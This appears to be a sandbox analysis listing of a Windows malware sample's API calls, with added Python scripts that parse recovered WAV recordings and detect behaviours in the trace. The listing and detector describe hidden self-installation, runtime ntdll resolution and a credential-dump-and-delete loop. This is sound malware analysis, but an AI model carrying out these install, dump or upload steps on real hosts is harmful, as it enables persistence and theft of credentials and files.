                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                              • Opcode Fuzzy Hash: 6bcc088d61530c7c680840eab27c4b5acbfb500225eb43698b3115ac788db025
                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                              APIs
                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                              Yara matches
                              Similarity
                              • API ID: File$Write$Create
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 1602526932-4212202414
                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
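The routine above references the strings RIFF, WAVE, fmt and data and emits its header in 4-, 4-, 2-, 2-, 4- and 4-byte WriteFile calls, which is the shape of a WAV writer. When such recordings are recovered from an infected host they are often cut short (the process was killed or the file was still open when the image was taken), so a streaming writer's RIFF size field cannot be trusted. The parser below is an added example written for this report, not code from Joe Sandbox or from the sample: it walks the chunks instead of believing the header, reports the format parameters and duration, and flags truncation. The sample WAV it parses is constructed in memory; `build_wav` exists only to produce that test input.

```python
import struct

# fmt-chunk layout for PCM: tag, channels, sample rate, byte rate, block align, bits/sample
FMT_STRUCT = "<HHIIHH"

def build_wav(pcm: bytes, channels: int = 1, rate: int = 8000, bits: int = 16) -> bytes:
    """Constructed test input: a canonical 44-byte RIFF/WAVE header followed by raw PCM."""
    block_align = channels * bits // 8
    fmt = struct.pack(FMT_STRUCT, 1, channels, rate, rate * block_align, block_align, bits)
    body = (b"WAVE"
            + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(pcm)) + pcm)
    return b"RIFF" + struct.pack("<I", len(body)) + body

def parse_wav(blob: bytes) -> dict:
    """Chunk-walk a RIFF/WAVE blob. The RIFF size is reported but not relied on:
    a writer that patches sizes at close time leaves it stale if it is killed first."""
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    riff_size = struct.unpack_from("<I", blob, 4)[0]
    info = {"riff_size": riff_size, "truncated": riff_size + 8 > len(blob)}
    pos = 12
    while pos + 8 <= len(blob):
        chunk_id = blob[pos:pos + 4]
        chunk_size = struct.unpack_from("<I", blob, pos + 4)[0]
        payload = blob[pos + 8:pos + 8 + chunk_size]      # shorter than chunk_size if cut
        if chunk_id == b"fmt " and len(payload) >= 16:
            tag, ch, rate, byte_rate, align, bits = struct.unpack_from(FMT_STRUCT, payload)
            info.update(format_tag=tag, channels=ch, sample_rate=rate,
                        byte_rate=byte_rate, block_align=align, bits_per_sample=bits)
        elif chunk_id == b"data":
            info["data_bytes"] = len(payload)              # bytes actually present on disk
        pos += 8 + chunk_size + (chunk_size & 1)           # chunks are word-aligned
    if info.get("byte_rate") and "data_bytes" in info:
        info["duration_s"] = info["data_bytes"] / info["byte_rate"]
    return info

if __name__ == "__main__":
    sample = build_wav(b"\x00\x00" * 8000)                 # one second of silence, 8 kHz mono
    print(parse_wav(sample))
    print(parse_wav(sample[:-4000]))                       # simulated partial recording
```

`duration_s` is computed from the bytes present, so a partial recording reports the audio that can actually be played rather than what the header promised.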
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                              • API String ID: 1646373207-3223399652
                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                              APIs
                              • _wcslen.LIBCMT ref: 0040BC75
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                              • _wcslen.LIBCMT ref: 0040BD54
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                              • _wcslen.LIBCMT ref: 0040BE34
                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                              • ExitProcess.KERNEL32 ref: 0040BED0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                              • String ID: 6$C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$del$open$BG$BG
                              • API String ID: 1579085052-526394719
                              • Opcode ID: e0a16f559127d09f0ccc6f97ebc8cf50c5a28ba69ebce78da21257fbd8aea4e5
                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                              • Opcode Fuzzy Hash: e0a16f559127d09f0ccc6f97ebc8cf50c5a28ba69ebce78da21257fbd8aea4e5
                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                              APIs
                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                              • lstrlenW.KERNEL32(?), ref: 0041B207
                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                              • _wcslen.LIBCMT ref: 0041B2DB
                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                              • GetLastError.KERNEL32 ref: 0041B313
                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                              • GetLastError.KERNEL32 ref: 0041B370
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                              • String ID: ?
                              • API String ID: 3941738427-1684325040
                              • Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                              • Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$EnvironmentVariable$_wcschr
                              • String ID:
                              • API String ID: 3899193279-0
                              • Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                              • Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                              • Sleep.KERNEL32(00000064), ref: 00412060
                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                              • String ID: /stext "$HDG$HDG$>G$>G
                              • API String ID: 1223786279-3931108886
                              • Opcode ID: b54433d13c11c165ac155464e4e43aa2172903c58834ce8240512e9510c7ef5d
                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                              • Opcode Fuzzy Hash: b54433d13c11c165ac155464e4e43aa2172903c58834ce8240512e9510c7ef5d
                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
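Three of the routines listed above are worth turning into checks that run over the listing itself rather than over a live host: the function at 004064F4, which resolves NtAllocateVirtualMemory, NtFreeVirtualMemory, the PEB-lock routines and LdrEnumerateLoadedModules from ntdll by name; the function at 0040BC8E, which copies the running executable into a new directory, sets attribute 0x7 (READONLY|HIDDEN|SYSTEM) on the copy, relaunches it through ShellExecuteW("open") and exits; and the function at 00411C9A, whose "/stext" string is the NirSoft command-line switch for a plain-text report, followed by Sleep and DeleteFileW, the usual run-tool, read-report, delete-report loop. The script below is an added example for this report, not code from Joe Sandbox or from the sample. It parses bullets in the shape of the "APIs" and "String ID" lines shown here and applies those three checks; the ntdll watch-list, the shortened sample path and the trace it runs on are constructed for the example.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# One "APIs" bullet of the listing: API.MODULE(args), ref: ADDR  (the args are optional)
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# The "String ID" bullet joins a function's referenced strings with '$'
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
HIDE_MASK = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM   # the trace's 0x7 also sets READONLY

# ntdll exports worth flagging when looked up by name (assumed watch-list, not from the report)
WATCHED_NTDLL = {
    "NtAllocateVirtualMemory", "NtFreeVirtualMemory", "NtWriteVirtualMemory",
    "LdrEnumerateLoadedModules", "RtlAcquirePebLock", "RtlReleasePebLock",
}

class Call(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int

def hex_arg(s: str) -> Optional[int]:
    """Numeric arguments are printed as exactly 8 hex digits; anything else is a string."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s) else None

def parse_trace(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:                      # headings and "Part of subcall function" lines
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls

def parse_string_ids(text: str) -> List[str]:
    out: List[str] = []
    for line in text.splitlines():
        m = STRING_ID_LINE.match(line)
        if m:
            out.extend(s for s in m["ids"].split("$") if s)
    return out

def dynamic_ntdll_resolution(calls: List[Call]) -> List[str]:
    """GetModuleHandleW(ntdll.dll, <export>) immediately followed by GetProcAddress.
    The sandbox prints the export name as the second stack value of the first call."""
    hits = []
    for prev, cur in zip(calls, calls[1:]):
        if (prev.api == "GetModuleHandleW" and len(prev.args) >= 2
                and prev.args[0].lower() == "ntdll.dll"
                and prev.args[1] in WATCHED_NTDLL
                and cur.api == "GetProcAddress"):
            hits.append(prev.args[1])
    return hits

def self_copy_hidden_install(calls: List[Call], sample_path: str) -> int:
    """Ordered chain CopyFileW(<own path>) -> SetFileAttributesW(HIDDEN|SYSTEM)
    -> ShellExecuteW(open) -> ExitProcess. Returns stages seen; 4 means the full chain."""
    stage = 0
    for c in calls:
        if stage == 0 and c.api == "CopyFileW" and c.args and c.args[0].lower() == sample_path.lower():
            stage = 1
        elif stage == 1 and c.api == "SetFileAttributesW" and len(c.args) >= 2:
            attrs = hex_arg(c.args[1])
            if attrs is not None and attrs & HIDE_MASK == HIDE_MASK:
                stage = 2
        elif stage == 2 and c.api == "ShellExecuteW" and "open" in c.args:
            stage = 3
        elif stage == 3 and c.api == "ExitProcess":
            return 4
    return stage

def stext_credential_dump(calls: List[Call], strings: List[str]) -> bool:
    """'/stext' plus Sleep and DeleteFileW in one routine: run the tool, read and delete its report."""
    has_switch = any(s.strip().startswith("/stext") for s in strings)
    apis = {c.api for c in calls}
    return has_switch and "DeleteFileW" in apis and "Sleep" in apis

# Constructed sample in the shape of the listing above (sample path shortened for readability)
SAMPLE_PATH = r"C:\Users\user\Desktop\sample.exe"
SAMPLE_TRACE = r"""
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Users\user\Desktop\sample.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000), ref: 0041AB5F
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• String ID: /stext "$HDG$HDG$>G$>G
"""

def analyse(text: str = SAMPLE_TRACE, sample_path: str = SAMPLE_PATH) -> dict:
    calls, strings = parse_trace(text), parse_string_ids(text)
    return {
        "dynamic_ntdll": dynamic_ntdll_resolution(calls),
        "install_chain_stage": self_copy_hidden_install(calls, sample_path),
        "stext_dump": stext_credential_dump(calls, strings),
    }

if __name__ == "__main__":
    print(analyse())
```

The install check is deliberately ordered: a copy of the binary that is merely hidden is not interesting on its own, but copy, hide, relaunch and exit in that sequence is the installer behaviour the 0040BC8E listing shows, and the returned stage number tells you how far a partial match got.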
                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                              • GetCursorPos.USER32(?), ref: 0041CAF8
                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                              • ExitProcess.KERNEL32 ref: 0041CB74
                              • CreatePopupMenu.USER32 ref: 0041CB7A
                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                              • String ID: Close
                              • API String ID: 1657328048-3535843008
                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                              • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                              • __aulldiv.LIBCMT ref: 00407FE9
                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                              • API String ID: 1884690901-3066803209
                              • Opcode ID: 935731731395f4204ceec93af99d173b12a0ee120979e523140cd68d8dd48b07
                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                              • Opcode Fuzzy Hash: 935731731395f4204ceec93af99d173b12a0ee120979e523140cd68d8dd48b07
                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                              APIs
                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
